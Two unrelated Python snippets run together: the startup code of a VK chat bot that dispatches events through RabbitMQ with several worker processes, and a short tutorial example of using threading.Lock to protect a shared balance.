    dp.setup_middleware(BotAdminMiddleware())
    dp.setup_middleware(ChatsRegistrationMiddleware())
    dp.setup_middleware(UsersRegistrationMiddleware())


def setup_rules():
    """
    Register rules for blueprints.
    :return:
    """
    from shuecm.rules import Texts, UserHavePermission, TextsWithArgs

    dp.setup_rule(UserHavePermission)
    dp.setup_rule(TextsWithArgs)
    dp.setup_rule(Texts)


async def run():
    # Check the database before starting.
    await pre_start_db(vk.loop)
    # Set up Sentry error tracking.
    setup_sentry()
    # Set up bot rules; blueprints don't work without rules.
    setup_rules()
    # Set up blueprints (add commands to the bot).
    setup_blueprints()
    # Set up middlewares for user authorization, etc.
    setup_middlewares()
    if not PRODUCTION:
        # Polling is used only for tests.
        # Do not use it in production: polling may skip events (thanks to the VK API ;) )
        # and it does not scale well.
        dp.run_polling()
    elif PRODUCTION:
        # We use RabbitMQ for event dispatching.
        # You can run this code in many processes (via the multiprocessing module)
        # for more performance, or run many instances of the application.
        from vk.bot_framework.extensions.rabbitmq import RabbitMQ

        dp.setup_extension(RabbitMQ)
        dp.run_extension("rabbitmq", vk=vk, queue_name="test_queue")


def start():
    """Run a single RabbitMQ receiver worker (one is spawned per process)."""
    manager = TaskManager(vk.loop)
    manager.add_task(run)
    manager.run()


if __name__ == "__main__":
    # Wrapper over asyncio.
    if PRODUCTION:
        import multiprocessing as mp

        processes = []
        for i in range(1, 6):
            process = mp.Process(target=start)
            processes.append(process)
            logger.info(f"[{i}] process added!")

        for index, process in enumerate(processes, start=1):
            process.start()
            logger.info(f"[{index}] process started!")
    else:
        manager = TaskManager(vk.loop)
        manager.add_task(run)
        manager.run()
do_lock.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import time, threading

# Assume this is your bank balance:
balance = 0
lock = threading.Lock()


def change_it(n):
    # Deposit first, then withdraw; the result should be 0:
    global balance
    balance = balance + n
    balance = balance - n


def run_thread(n):
    for i in range(100000):
        # Acquire the lock first:
        lock.acquire()
        try:
            # Now it is safe to change the balance:
            change_it(n)
        finally:
            # Always release the lock when done:
            lock.release()


t1 = threading.Thread(target=run_thread, args=(5,))
t2 = threading.Thread(target=run_thread, args=(8,))
t1.start()
t2.start()
t1.join()
t2.join()
print(balance)
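Since threading.Lock is a context manager, the acquire/try/finally/release pattern in run_thread above can be written more compactly with a with block. A minimal equivalent sketch (the function name is illustrative):

def run_thread_with_block(n):
    # Equivalent to run_thread above: `with lock:` acquires the lock and
    # guarantees it is released even if change_it() raises.
    for i in range(100000):
        with lock:
            change_it(n)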